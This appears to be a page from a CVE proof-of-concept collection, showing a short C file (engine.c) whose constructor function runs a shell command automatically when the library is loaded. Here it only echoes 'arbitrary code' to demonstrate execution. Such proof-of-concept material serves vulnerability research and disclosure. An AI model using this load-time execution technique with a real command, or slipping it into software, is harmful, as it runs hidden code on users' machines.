4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / engine.c C
#include <unistd.h>

__attribute__((constructor))
static void init() {
    execl("/bin/sh", "sh", "-c","echo 'arbitrary code'");
}